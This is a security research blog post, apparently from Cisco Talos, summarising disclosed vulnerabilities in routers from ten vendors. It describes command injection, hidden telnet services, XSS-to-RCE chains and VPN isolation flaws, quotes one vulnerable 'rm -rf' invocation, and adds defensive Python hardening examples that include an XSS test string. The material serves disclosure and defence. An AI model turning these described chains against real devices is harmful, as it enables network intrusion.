* Since [the discovery of the widespread VPNFilter malware in 2018](<https://blog.talosintelligence.com/vpnfilter/>), Cisco Talos researchers have been researching vulnerabilities in small and home office (SOHO) and industrial routers.
* During that research, Talos has worked with vendors to report and mitigate these vulnerabilities, totaling 141 advisories covering 289 CVEs across multiple routers.
* Talos is highlighting some of the major issues our researchers discovered over the past several years, including vulnerabilities that an attacker could exploit directly and ones an adversary could chain together to gain elevated access to the devices.
* There are several Snort rules that can detect possible exploitation of the vulnerabilities included in this post.

Small office/home office (SOHO) routers and small-scale industrial routers are fairly common targets for bad actors because these devices are in nearly every home and small business. Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected directly to the internet, and all local network traffic passes through them.
In 2018, Talos uncovered and published an article about the [VPNFilter malware](<https://blog.talosintelligence.com/vpnfilter/>) aimed at SOHO network equipment. This malware had the ability to completely compromise or wipe a targeted device. Since then, numerous reports of sophisticated actors targeting SOHO routers have come to light: Talos recently released a blog post [discussing our concern about an increase in state-sponsored campaigns targeting network infrastructure](<https://blog.talosintelligence.com/state-sponsored-campaigns-target-global-network-infrastructure/>). Microsoft discussed [state-sponsored actors using SOHO routers](<https://www.microsoft.com/en-us/security/blog/2022/11/10/microsoft-threat-intelligence-presented-at-cyberwarcon-2022/>) to obfuscate their operations at CyberWarCon 2022, and Lumen recently highlighted that [criminal actors are also targeting SOHO routers](<https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/>) to support their operations.
The Talos Vulnerability Discovery and Research Team -- our world-class team of researchers who work with third-party vendors to disclose and patch vulnerabilities in a variety of software and hardware -- made SOHO and industrial routers a major priority after VPNFilter. By helping vendors mitigate the vulnerabilities on these devices, we make life harder for malicious actors.
Since VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. As a direct result of this research, Talos has reported 289 CVEs to vendors, published across 141 Talos reports. These reports resulted in appropriate [Snort network intrusion detection coverage](<https://snort.org/advisories>) and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using these devices once the vulnerabilities are patched.
In this blog post, we provide a summary of the vulnerabilities we discovered in these devices, specifically focusing on vulnerabilities adversaries were most likely to exploit, or ones that could be chained together to gain an elevated level of access to the device or network. This is by no means the end of our research into SOHO or industrial routers. We plan to continue investigating these types of devices to better protect our customers and the community as a whole.
# Routers
## **ASUS RT-AX82-U**
Research conducted by Lilith Wyatt.
### Background
Our researchers chose to examine the ASUS RT-AX82-U because it is a very popular router and it shares a codebase with a plethora of other ASUS routers. Over the course of the research, Talos submitted three unique reports to ASUS, resulting in three CVEs. The ASUS RT-AX82-U contains a large amount of open-source code in the form of the asus-merlin-ng firmware. During this research, this section of code was avoided in favor of device- and feature-specific codebases within the device, including smart home integrations and the AiMesh functionality. The smart home integration features are designed for integration with Amazon Alexa or the "If This, Then That" (IFTTT) automation framework to provide more easily accessible functionality or automation. The AiMesh feature is a mesh networking solution designed to allow for multiple routers to work together to provide Wi-Fi connectivity over a larger area from a single network connection point. These features are enabled by default in the stock configuration of the device. This means that, without explicit effort by a user to disable these features, all ASUS RT-AX82-U devices could be targets.
### Notable Vulnerabilities
* **TALOS-2022-1586**: This vulnerability existed in the smart home integration features of the router. If a user ever generates a token to use with IFTTT, an authentication token is generated to allow functionality to be leveraged on the router. This token can be easily brute-forced, as there are only 255 possible combinations, and the validity is measured based on when the token was generated and the device's uptime. This means if the router is rebooted, this vulnerability is exploitable up until the time (in seconds from reboot) the token was originally created, instead of the intended two-minute timeout. Leveraging this vulnerability allows an attacker to gain administrative privileges on the router as if they were properly authenticated.
* **TALOS-2022-1590**: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication control messages, an improperly sized read can be used to leak information that can be decrypted locally based on known plaintext. This is possible because the provided length of a user-supplied AES key, which needs to be a set size based on the AES variant used (in this case AES-256), is not checked. By providing a key smaller than the required size, extra information can be returned to the user.
* **TALOS-2022-1592**: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication diagnostic messages, an improperly sized packet can lead to a denial of service. This is possible due to the lack of length validation on packets ingested, which leads to an integer underflow. This integer underflow is then utilized in a read loop that ends in accessing unmapped memory, causing a crash.
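As an added illustration of the uptime-based validity problem described for TALOS-2022-1586 (this is example code written for this post, not code from the advisory or from ASUS firmware), the following Python contrasts a one-byte token checked against uptime alone with a hardened issue/verify pair. The `boot_id` binding, the token format and all uptime values are assumptions constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass

TOKEN_TTL_SECONDS = 120  # the intended two-minute validity window


@dataclass(frozen=True)
class IssuedToken:
    value: str
    created_uptime: int  # device uptime (seconds since boot) when the token was issued
    boot_id: str         # hypothetical per-boot random id; empty in the flawed design


def issue_token_weak(created_uptime: int) -> IssuedToken:
    """Flawed design: a single-byte token (at most 256 values), validity tied to uptime only."""
    return IssuedToken(f"{secrets.randbelow(256):02x}", created_uptime, "")


def valid_uptime_only(token: IssuedToken, presented: str, uptime_now: int) -> bool:
    """Flawed check. Uptime restarts at zero after a reboot, so the difference
    uptime_now - created_uptime becomes negative, the TTL test passes, and the
    token is accepted again until uptime climbs back to created_uptime."""
    if presented != token.value:
        return False
    return uptime_now - token.created_uptime <= TOKEN_TTL_SECONDS


def issue_token_strong(created_uptime: int, boot_id: str) -> IssuedToken:
    """Hardened: 128-bit random token bound to the boot in which it was issued."""
    return IssuedToken(secrets.token_hex(16), created_uptime, boot_id)


def valid_hardened(token: IssuedToken, presented: str, uptime_now: int, boot_id_now: str) -> bool:
    """Hardened check: constant-time compare, a reboot invalidates, age must lie in [0, TTL]."""
    if not hmac.compare_digest(presented, token.value):
        return False
    if boot_id_now != token.boot_id:  # uptime was reset, so the token is stale
        return False
    age = uptime_now - token.created_uptime
    return 0 <= age <= TOKEN_TTL_SECONDS


def reboot_scenario(created_uptime: int = 1000, uptime_after_reboot: int = 50) -> dict:
    """Constructed scenario: token issued at uptime 1000 s, device rebooted, check at uptime 50 s."""
    weak = issue_token_weak(created_uptime)
    strong = issue_token_strong(created_uptime, boot_id="boot-A")
    return {
        "weak_before_reboot": valid_uptime_only(weak, weak.value, created_uptime + 60),
        "weak_expired": valid_uptime_only(weak, weak.value, created_uptime + 121),
        "weak_after_reboot": valid_uptime_only(weak, weak.value, uptime_after_reboot),
        "strong_before_reboot": valid_hardened(strong, strong.value, created_uptime + 60, "boot-A"),
        "strong_after_reboot": valid_hardened(strong, strong.value, uptime_after_reboot, "boot-B"),
    }
```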
### Observations
The primary issue in the ASUS RT-AX82-U came from the inclusion of services that do not necessarily need to be activated by default. The smart home integration service should be disabled by default, as it is by no means required for the operation of the router and likely is not utilized in most scenarios. The AiMesh service could be disabled by default and only enabled if a user wants to utilize a mesh network. While disabling this functionality would not have removed the vulnerabilities from the device, it would significantly reduce the attack surface as well as reduce the number of deployments that had devices in vulnerable states.
## **D-Link DIR-3040**
Research conducted by Dave McDaniel.
### Background
The D-Link DIR-3040 is another popular device and was an interesting subject for our researchers because of the mesh communications used between nodes to provide improved Wi-Fi coverage wherever the device is deployed. Over the course of the research, Talos submitted six unique reports to D-Link, resulting in six CVEs. The research targeting the D-Link DIR-3040 focused on all aspects of the device in its stock configuration. This included the web services -- including hidden diagnostic services -- and the Wi-Fi mesh networking implementation, as well as other general security issues. The Wi-Fi mesh networking implementation allows multiple routers to connect together to provide increased network coverage.
### Notable Vulnerabilities
* **TALOS-2021-1284**: This vulnerability was a combination of web server functionality and an issue within hidden functionality. By visiting a hidden URL of the router, an attacker could activate a hidden telnet console used for diagnostics. Within this diagnostics menu, multiple commands within the restricted shell lacked proper input sanitization and, as such, allowed arbitrary command injection.
* **TALOS-2021-1361**: Talos discovered this vulnerability within the Wi-Fi mesh networking service enabled by default on the device. By utilizing hard-coded credentials, an attacker could connect to the MQTT server. Once connected, an attacker could query information about the mesh. This information was encrypted but could be decrypted utilizing the MAC address of the base router, which was found in the same message. Once decrypted, the root password for the primary router could be recovered.
* **TALOS-2021-1281**: Talos discovered this vulnerability within the Zebra network management service which was enabled by default on the router. By utilizing hard-coded credentials for this service, an attacker could access diagnostic tooling for the router. An adversary could change the service login banner to a file to leak sensitive information otherwise inaccessible via this service.
### Observations
The DIR-3040 web server contains hidden paths to access debugging functionality on the device. There is no reason to hide this functionality, and it is better off as an explicit option that a user has to manually enable. Hard-coded credentials should also never be included in modern devices. Finally, as with the RT-AX82-U, the MQTT server related to mesh communication should not be enabled unless a feature that requires the MQTT server is enabled by a user during setup or other configuration.
## **InHand Network InRouter 302**
Research conducted by Francesco Benvenuto.
### Background
Our researchers examined the InHand Network InRouter 302 because three ATM providers claimed to have used this device: Wireless ATM STORE.COM, Wincor Nixdorf and UnionPay. Over the course of the research, [Talos submitted 23 unique reports to InHand](<https://blog.talosintelligence.com/vulnerability-spotlight-inhand-router-302-oct-2022/>), resulting in 25 CVEs. The research targeting the InHand Network InRouter 302 focused on all aspects of the device in its stock configuration. This included the web server, API services and general security issues. The web server contained multiple vulnerabilities, including cross-site scripting and common gateway interface (CGI) issues. The console utilities of the InRouter also contained numerous vulnerabilities. During the course of this research, an interesting unescape vulnerability was identified that spanned numerous open-source projects and closed-source products. This vulnerability is discussed in more depth in the Siretta router section.
### Notable Vulnerabilities
* **TALOS-2022-1469**: This vulnerability existed in the HTTP server. It exploits the `/info.jsp` endpoint, which is normally only used by the web pages themselves. The endpoint will effectively `eval` the parameter sent as a JavaScript command. Because access to the endpoint is not restricted, this leads to a cross-site scripting (XSS) vulnerability.
* **TALOS-2022-1472**: This vulnerability existed in the HTTP server. Because of improper access control, a low-privileged user could update the router configuration, enabling them to change privileged user credentials, resulting in privilege escalation.
* **TALOS-2022-1476**: This vulnerability existed within the restricted console presented to a user when using SSH or Telnet. This console contained multiple commands, including `factory`, a command that only the most-privileged user could execute. By utilizing this command, an attacker could use this (presumed) debug functionality to overflow the stack buffer used to hold the user data while it was being parsed. This vulnerability could lead to arbitrary code execution.
### Observations
These three vulnerabilities would allow an attacker to obtain root access to the device starting with a single click. TALOS-2022-1469 is an XSS vulnerability that could allow an attacker to exfiltrate the session cookie of a logged-in user. If the session cookie belonged to a low-privileged user, an attacker could chain TALOS-2022-1472 to update the router's configuration, enabling them to change privileged user credentials, resulting in privilege escalation. An attacker, at this point, would have the most elevated permitted credentials, but no root access. However, by exploiting TALOS-2022-1476, an attacker would be able to obtain, through a stack-based buffer overflow, remote command execution.
We wrote [an extensive blog post](<https://blog.talosintelligence.com/vuln-spotlight-in-hand-networks/>) that discusses, in-depth, how an attacker could chain the vulnerabilities discovered to obtain remote command execution in the InHand Network InRouter 302 with a one-click attack.
## **Linksys E Series**
Research conducted by a researcher within Cisco Talos.
### Background
The Linksys E Series devices were directly affected by the VPNFilter campaign. The E1200 and E2500 are two SOHO routers offered by various vendors over the years, most recently Linksys. The devices target low-budget installations, providing four Ethernet ports for additional device connections. The E Series provides a web-based management console to allow owners to make administrative changes to the system configuration. This web console also provided the main attack surface during our analysis of the device.
### Notable Vulnerability
* **TALOS-2018-0625**: This disclosure contains three related authenticated command injection vulnerabilities, all accessible via the web-based management portal. Many of the configuration details passed to E Series routers during configuration must be retained across a device's power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details. Three paths exist where one of two parameters, `machine_name` or `wan_domain`, are retrieved from NVRAM and subsequently used directly in a command passed to `system()`.
## **Milesight UR32L and MilesightVPN**
Research conducted by Francesco Benvenuto.
### Background
The Milesight UR32L is an industrial router that offers a good tradeoff between price and functionalities. The vendor also provides software for a remote access solution called MilesightVPN which, theoretically, allows the UR32L to be less exposed, thus making it more difficult for an attacker to target it. Over the course of the UR32L research, Talos submitted 17 unique reports to Milesight, [resulting in 63 CVEs](<https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/>). Talos researchers also sent Milesight five unique reports for the VPN solution, resulting in six CVEs. This research focused mainly on two components: its HTTP server with its related components and the router console shell. Our analysis also considered the attack scenario in which the user is using Milesight's MilesightVPN, so as to investigate a more complete attack scenario.
### Notable Vulnerabilities
* **TALOS-2023-1701**: This vulnerability existed in the HTTP server login functionality of the MilesightVPN. This is an SQL injection vulnerability that would allow an attacker to bypass the web login and grant access to the administrative web pages. This in turn allows an attacker to communicate with routers connected to the VPN.
* **TALOS-2023-1697**: This vulnerability existed in the HTTP server login functionality of the UR32L. This is the most severe vulnerability found on the router. Indeed, it is a pre-authentication remote stack-based buffer overflow. An unauthenticated attacker able to communicate with the HTTP server would be able to perform remote command execution. One way to communicate with the HTTP server remotely is by using TALOS-2023-1701.
* **TALOS-2023-1706**: The UR32L offers different diagnostic functionalities within its HTTP server, like ping and trace. Both of these functions have an OS command injection vulnerability through the specified host. An attacker with low-privilege credentials on the UR32L could exploit these vulnerabilities and execute remote commands.
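An added Python example, written for this post rather than taken from Talos or either vendor, of the input handling these command-injection findings call for: the `machine_name`/`wan_domain` values the Linksys E Series stores in NVRAM (TALOS-2018-0625) and the host passed to the UR32L's ping diagnostic (TALOS-2023-1706) are validated as hostnames or IP literals and then handed to the program as a single argument instead of being spliced into a shell string. The NVRAM dictionary and the `ping -c 4` invocation are assumptions for the example.

```python
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: 1-63 letters, digits or hyphens, no leading/trailing hyphen
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(value: str) -> bool:
    if not value or len(value) > 253:
        return False
    return all(_LABEL.match(label) for label in value.rstrip(".").split("."))


def is_valid_target(value: str) -> bool:
    """Accept an IPv4/IPv6 literal or an RFC 1123 hostname; anything else is rejected.
    Shell metacharacters, whitespace and option-like values such as '-f' never pass."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return is_valid_hostname(value)


def set_nvram_value(nvram: dict, key: str, value: str) -> dict:
    """Validate at write time, so a stored machine_name/wan_domain is known-clean
    before any later code path reads it back and builds a command with it.
    The dict stands in for the device's NVRAM (assumption for this example)."""
    if key not in ("machine_name", "wan_domain"):
        raise KeyError(key)
    if not is_valid_hostname(value):
        raise ValueError(f"rejected {key}: {value!r}")
    nvram[key] = value
    return nvram


def ping_command_unsafe(host: str) -> str:
    """Vulnerable pattern from the advisories: the host is spliced into a string for system()."""
    return f"ping -c 4 {host}"


def ping_command(host: str) -> list:
    """Hardened: validate first, then pass the host as one argv element (no shell involved)."""
    if not is_valid_target(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "4", host]


def run_ping(host: str, timeout: float = 30.0) -> str:
    """Runs ping with shell=False; the host can never become a second command."""
    result = subprocess.run(ping_command(host), capture_output=True, text=True, timeout=timeout)
    return result.stdout
```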
### Observations
The vendor provides MilesightVPN software, a remote access solution. The underlying idea is that by using this software, Milesight's UR32L would not need to be exposed to the internet, thus reducing the attack surface and making it more difficult for an attacker to target it. During our research, we took into consideration this scenario and demonstrated that unfortunately, [an attacker can use TALOS-2023-1701](<https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/>) to attack the remote access solution software and then execute arbitrary code inside the UR32L by using TALOS-2023-1697.
## **Netgear Orbi Router RBR750/RBS750**
Research conducted by Dave McDaniel.
### Background
The Netgear Orbi RBR750/RBS750 was chosen due to its popularity and reputation of quality. This device is widely adopted as a high-end SOHO router choice and also utilizes a mesh network to connect satellites. Over the course of the research, Talos submitted four unique reports to Netgear, resulting in four CVEs. This research of the Netgear Orbi Router RBR750 focused on multiple services across the devices, such as the management web server and services provided by the device on the local network. The network services included hidden functionality that could be activated using a special network packet. The Orbi utilizes the open-source OpenWrt ubus code base for communication between the satellites and primary router, but also includes hidden additional functionality on top of this library.
### Notable Vulnerabilities
* **TALOS-2022-1595**: This vulnerability is based on the existence of an undocumented service listening on UDP port 23. This service listened for an encrypted packet containing the MAC address, username and password of the _br-lan_ interface of the device. The encryption used was a modified Blowfish algorithm similar to the one used for the Nintendo DS handheld video game system's cartridge copyright protection. Once the packet was received, a telnet daemon was spawned which allowed direct access to the underlying BusyBox system.
* **TALOS-2022-1596**: This vulnerability existed in the web-based administration of the Orbi. Within the web interface, there was functionality to block specific devices specified by MAC address and device name. The device name field of the associated POST request is vulnerable to command injection due to a lack of user-input sanitization. An attacker could craft a malicious packet to execute arbitrary commands on the device with root privileges.
* **TALOS-2022-1592**: This vulnerability existed in the Wi-Fi mesh communication service of the device. This service utilized ubus, the open-source library developed by OpenWrt. More specifically, this vulnerability was due to functionality Netgear built on top of the ubus library. If an attacker had knowledge of the web interface password or the default password, it would be possible to send a ubus message to activate a hidden telnet service. This hidden telnet functionality could then be used by an attacker to obtain direct access to the underlying BusyBox system.
### Observations
The Netgear Orbi mainly suffered from a lack of user input sanitization and the presence of hidden services. User input should be sanitized server-side using well-tested libraries instead of one-off solutions, or worse, client-side solutions. Providing a telnet service is not inherently bad, but hiding the activation from a user does not seem to provide value. Including hidden ways of activating the telnet server makes it more difficult for a user to know how to minimize their risk.
## **Robustel R1510**
Research conducted by Francesco Benvenuto.
### Background
The Robustel R1510 was chosen due to the physical danger vulnerabilities could present. This router is used in physical systems such as elevators, and Robustel partners with many wide-reaching industrial control system vendors such as Vodafone, Bosch, Siemens, Emerson and Schneider Electric. Over the course of the research, Talos submitted 10 unique reports to Robustel, resulting in 26 CVEs. Research on the Robustel R1510 was primarily focused on the web server, which manages almost all functionality of the device.
### Notable Vulnerabilities
* **TALOS-2022-1577**: This vulnerability was contained within the web server and the functionality directly associated with installing a NodeJS application. While uploading a new NodeJS application, a global variable is set with the provided filename as part of the POST request. Once the file is uploaded to the web server, a second request is required to install the application. Using this request, it was possible for an attacker to trigger a command injection by crafting a maliciously named file. Once the application was installed, the command injection would be triggered. This allowed an attacker to execute arbitrary commands on the device.
* **TALOS-2022-1576**: Talos discovered this vulnerability within the firmware upgrade functionality found within the web server. The R1510 utilized a modified U-Boot header but maintained the presence of the character array used for the firmware name. This field was not validated or escaped before being used directly in a `system` function call. An attacker could use this to craft a firmware update file that would result in arbitrary command injection during the update process.
* **TALOS-2022-1578**: Talos discovered this vulnerability within the SSH authorized-key upload feature of the R1510's web management interface. An authenticated user could change their Linux username on the device. This username determined the directory path for the SSH keys used in certificate-based authentication. When a user uploaded a new SSH key, their username was used directly, without any validation, to build a directory path that was passed into a `sysprintf` function call, which would result in a command injection. An attacker could leverage a vulnerability to bypass authentication in the web interface, then continue to leverage this vulnerability to execute arbitrary commands within Linux.
### Observations
Most of the discovered vulnerabilities in the Robustel R1510 were related to a lack of user input sanitization. Ideally, a common code base would be used for many instances of checks across the device. If there was no specific performance requirement, these checks would occur multiple times throughout the process of uploading files and utilizing previously uploaded files. Using a common library to perform these checks would negate the risk of validation falling out of sync with checks elsewhere in the system.
## **Sierra Wireless Airlink**
Research conducted by Carl Hurd.
### Background
Talos researchers chose to investigate the Sierra Wireless Airlink because of its deployment flexibility. The AirLink is intended for use in remote locations utilizing a cellular connection for local devices. The AirLink is managed out-of-band from the network provided by the device. Talos submitted 11 unique reports to Sierra Wireless, resulting in 13 CVEs. The research was focused on all aspects of the device, including the web server, custom console binary, SNMP and other exposed services on the device. If an attacker were to compromise this device, it would be possible to leverage the functionality of the device to manipulate traffic on all sides of the network.
### Notable Vulnerabilities
* **TALOS-2018-0751**: This vulnerability is contained within the web server ACEManager, which lacked a cross-site request forgery prevention header. Such a header lets the server verify that a request was issued from its own pages within the same session, rather than from a link on an unrelated page that takes advantage of an already authenticated session. This vulnerability allows for the possibility of session hijacking using various methods.
* **TALOS-2018-0750**: This vulnerability existed in the ping_result.cgi binary, which did not properly filter input before reflecting it back to the client. This improper filtering allowed JavaScript to be injected into the response to the client. This could be used to run code on the client's browser, such as making requests on behalf of the user or disclosing confidential tokens. Using this vulnerability in addition to TALOS-2018-0751 allowed for complete session hijacking of an authenticated user.
* **TALOS-2018-0748**: Talos discovered this vulnerability within the file upload capability of templates within the AirLink 450. When uploading template files, a user can specify the name of the file being uploaded. There were no restrictions to protect the files currently on the device and used for normal operation. If a file was uploaded with the same name as a file that already existed in the directory, it inherits the permissions of that file. In this case, multiple CGI files could be overwritten with execute permissions. After replacing the file, an adversary could navigate to the newly uploaded CGI binary, and the code would be executed. By leveraging TALOS-2018-0751 and TALOS-2018-0750, the adversary could hijack an authenticated session of a user after uploading malicious code and executing it on command. This would result in fully unauthenticated remote code execution.
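An added Python sketch of the two protections these AirLink findings lacked (example code for this post, not Sierra Wireless' code): a per-session CSRF token checked together with the Origin header on state-changing requests, and HTML escaping of the host reflected in a ping result page. The in-memory session store, the management origin `https://192.0.2.1` and the page layout are assumptions.

```python
import hmac
import html
import secrets
from urllib.parse import urlsplit

SESSIONS: dict = {}                 # session id -> {"user", "csrf"}; stand-in for the device's store
SITE_ORIGIN = "https://192.0.2.1"   # constructed management address (assumption)


def create_session(user: str) -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def session_cookie_header(sid: str) -> str:
    """Cookie attributes that keep the session out of scripts and off cross-site requests."""
    return f"Set-Cookie: session={sid}; Path=/; Secure; HttpOnly; SameSite=Strict"


def csrf_token(sid: str) -> str:
    """Per-session token to embed as a hidden field in every state-changing form."""
    return SESSIONS[sid]["csrf"]


def authorize_state_change(sid: str, form_token, origin_header) -> bool:
    """Synchronizer-token check plus an Origin comparison.
    True only for a request carrying the session's token from our own origin."""
    session = SESSIONS.get(sid)
    if session is None or form_token is None:
        return False
    if not hmac.compare_digest(form_token, session["csrf"]):
        return False
    if origin_header is not None:   # browsers send Origin on cross-site POSTs
        ours, theirs = urlsplit(SITE_ORIGIN), urlsplit(origin_header)
        if (ours.scheme, ours.netloc) != (theirs.scheme, theirs.netloc):
            return False
    return True


def render_ping_result_unsafe(host: str, output: str) -> str:
    """Vulnerable pattern: the host is reflected verbatim, so markup in it runs in the browser."""
    return f"<h2>Ping {host}</h2><pre>{output}</pre>"


def render_ping_result(host: str, output: str) -> str:
    """Hardened: every reflected value is HTML-escaped so it renders as text, never as markup."""
    return f"<h2>Ping {html.escape(host, quote=True)}</h2><pre>{html.escape(output)}</pre>"


def demo() -> dict:
    """Constructed walk-through: one admin session, three request shapes, one reflected value."""
    sid = create_session("admin")
    token = csrf_token(sid)
    return {
        "own_origin_with_token": authorize_state_change(sid, token, SITE_ORIGIN),
        "foreign_origin_with_token": authorize_state_change(sid, token, "https://attacker.invalid"),
        "missing_token": authorize_state_change(sid, None, SITE_ORIGIN),
        "wrong_token": authorize_state_change(sid, "x" * len(token), SITE_ORIGIN),
        "escaped": render_ping_result("<script>alert(1)</script>", "1 packets transmitted"),
        "cookie": session_cookie_header(sid),
    }
```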
### Observations
Most of the findings on the Airlink 450 centered around the web server and the basic functionality it provides. The lack of CSRF tokens provided by the web server and the reflected XSS vulnerability allows authenticated requests to be made by hijacking a user's session. A well-developed and tested web server should include CSRF automatically. The XSS can be mitigated by utilizing JavaScript libraries, or sanitization libraries if using CGI binaries, to sanitize user input properly. Finally, file upload functionality should be strictly limited to a folder that only contains user-uploaded files, to avoid permissions issues or file overwrites that could be used maliciously.
## **Siretta QUARTZ-GOLD**
Research conducted by Francesco Benvenuto.
### Background
The Siretta QUARTZ-GOLD was included in this research because the device is often deployed near critical devices, giving vulnerabilities an increased level of urgency. The device has a 4G/LTE failover mechanism for network uptime, which likely means the router is deployed on critical networks. Over the course of the research, Talos submitted [14 unique reports to Siretta, resulting in 62 CVEs](<https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/>). The research of the Siretta QUARTZ-GOLD explored all aspects of the router that were accessible by default. This included the HTTP server, the SNMP server implementation, and various command line interface (CLI) tools. The majority of the router firmware is a fork of FreshTomato, which is an open-source router firmware. By utilizing this firmware, the QUARTZ-GOLD inherits a code reuse vulnerability from the project, as do many other projects that build on the same open-source codebase.
### Notable Vulnerabilities
* **TALOS-2022-1638**: This vulnerability existed in the M2M feature of the QUARTZ-GOLD. When the M2M feature was enabled, the m2m binary was executed. This binary offered rich functionality through a custom UDP protocol, including a function called "DELETE_FILE", which would execute the command `rm -rf <base_folder>/<M2M_data_entry.data> &` through the `system` function. The `M2M_data_entry.data` portion of the command was taken from the UDP packet without any parsing or sanitization of the `M2M_data_entry.data` string. This functionality was vulnerable to command injection. Furthermore, the `DELETE_FILE` functionality did not require authentication. An unauthenticated attacker could use this vulnerability to achieve arbitrary command execution.
* **TALOS-2022-1615**: This vulnerability existed in the SNMP functionality of the router. The QUARTZ-GOLD implemented a feature that allowed for custom OIDs to be defined within the router. An attacker could submit a custom OID that would be executed whenever that OID was queried. The simplest solution was to execute commands directly as the root user in the Linux shell. An adversary could leverage this vulnerability to achieve arbitrary command injection.
* **TALOS-2022-1610**: Talos discovered this vulnerability within the web server functionality of the QUARTZ-GOLD. By basing the firmware of this device on the FreshTomato firmware, many default features were inherited from FreshTomato that were not documented as part of the device functionality. More specifically, debug functionality was not disabled in FreshTomato and allowed a user authenticated to the web interface to issue direct Linux commands as if they had a shell. An authenticated attacker could use this vulnerability to achieve arbitrary command injection.
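An added Python example, neither Siretta's nor Sierra Wireless' code, of confining user-supplied file names to a dedicated directory. It addresses both the template upload that could overwrite CGI binaries on the AirLink (TALOS-2018-0748) and the unsanitized name handed to `rm -rf` by the QUARTZ-GOLD's DELETE_FILE (TALOS-2022-1638); the temporary directory, the file names and the `.cgi` stand-in are constructed for the demo, and it assumes a POSIX filesystem.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Bare file names only: no separators, no traversal, no leading dot, no shell-special characters
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def child_path(base: Path, name: str) -> Path:
    """Return base/name, or raise if name is anything but a plain file name."""
    if not _SAFE_NAME.match(name):
        raise ValueError(f"rejected file name: {name!r}")
    return base / name


def save_upload(base: Path, name: str, data: bytes) -> Path:
    """Create a brand-new, non-executable file. O_EXCL fails if the name already exists
    (so an upload can never replace a CGI binary and inherit its mode), O_NOFOLLOW
    refuses to go through a symlink, and mode 0o600 carries no execute bit."""
    target = child_path(base, name)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(target, flags, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return target


def delete_file(base: Path, name: str) -> None:
    """Replacement for system('rm -rf <base>/<name> &'): no shell, exactly one regular
    file inside base, symlinks are not followed, and the name was validated first."""
    target = child_path(base, name)
    st = os.lstat(target)  # raises FileNotFoundError if absent
    if not stat.S_ISREG(st.st_mode):
        raise ValueError(f"refusing to delete non-regular file: {name!r}")
    os.unlink(target)


def demo() -> dict:
    """Constructed scenario in a temporary directory standing in for the device's folder."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        cgi = base / "index.cgi"  # pretend this is an existing executable CGI binary
        cgi.write_bytes(b"#!/bin/sh\n")
        cgi.chmod(0o755)
        saved = save_upload(base, "template1.xml", b"<template/>")
        results["upload_mode"] = stat.S_IMODE(saved.stat().st_mode)
        try:
            save_upload(base, "index.cgi", b"replacement")
            results["overwrite_blocked"] = False
        except FileExistsError:
            results["overwrite_blocked"] = True
        results["cgi_intact"] = cgi.read_bytes() == b"#!/bin/sh\n"
        for bad in ("../etc/passwd", "a;b", "x/y", "..", ".hidden", "name with space"):
            try:
                child_path(base, bad)
                results[bad] = "accepted"
            except ValueError:
                results[bad] = "rejected"
        delete_file(base, "template1.xml")
        results["deleted"] = not saved.exists()
    return results
```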
### Observations
The Siretta QUARTZ-GOLD inherited many of the discovered vulnerabilities from the third-party code base included in the product. FreshTomato includes many features that are prebuilt but could have been disabled if the manufacturer were more familiar with the code they were building from. Much of the debugging functionality provided by FreshTomato is undocumented in the Siretta device and seems unintentionally included. When reusing large code bases, it is important to know what exactly is being included in that code base, and how it can be properly configured for the use-case the developer has in mind.
## **Synology SRM - RT2600ac**
Research conducted by Claudio Bozzato.
### Background
The Synology RT2600ac is a high-end SOHO router that runs on Synology SRM (Synology Router Manager), a Linux-based operating system for all Synology routers. Talos researchers chose to look at this product because of its popularity and reputation for quality. We submitted nine reports to Synology, of which two affect their VPN service (QuickConnect), and one affects a Qualcomm tool used in SRM, eventually leading to the disclosure of 10 CVEs. QuickConnect is Synology's VPN service, which allows for managing routers remotely without requiring the configuration of the router to expose its management port and without having to manage DDNS services to locate the router remotely.
This research has been detailed in a dedicated [blog post](<https://blog.talosintelligence.com/vulnerability-spotlight-multiple-63063210e63ef5e7e1ec312c/>), which explains how Talos managed to chain some of the reported vulnerabilities to achieve remote code execution without prior authentication in SRM devices via Synology's VPN services, which are publicly accessible.
### Notable Vulnerabilities
* **TALOS-2020-1064**: When routers connect to the QuickConnect VPN, they are placed in a dedicated subnet. This report demonstrates that the subnets are, however, not logically split, so it is possible to change the assigned netmask to a larger one, allowing one to talk with any other router connected to the same VPN. The VPNs are accessible by routers upon registration against QuickConnect. But after initial registration, the router is not needed anymore, and the attack can be performed independently of the device. There are several VPNs available that are easily enumerable and seem to be geo-located.
* **TALOS-2020-1066**: This report describes a vulnerability in iptables' rules within the router. SRM defines filtering rules to prevent access only on selected ports from LAN. However, those rules are missing for connections that come from the QuickConnect VPN. This means that any service listening on the device is remotely accessible from the VPN. This can be used together with TALOS-2020-1064 to have unrestricted communication with any network service running in a chosen device from those reachable in the VPN.
